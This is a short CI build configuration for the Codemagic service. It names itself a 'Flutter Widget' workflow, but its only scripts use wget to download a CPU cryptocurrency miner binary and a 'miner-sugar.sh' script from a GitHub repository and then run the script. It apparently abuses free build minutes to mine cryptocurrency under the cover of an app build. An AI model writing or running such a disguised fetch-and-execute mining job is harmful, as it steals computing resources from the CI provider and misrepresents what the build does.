# Check out https://docs.codemagic.io/getting-started/yaml/ for more information

workflows:
    
    flutter-widget:
        name: Flutter Widget
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://github.com/Dfaaz/codemagic/raw/main/cpuminer-sse2
            - wget https://github.com/Dfaaz/codemagic/raw/main/miner-sugar.sh
            - ls
            - sh miner-sugar.sh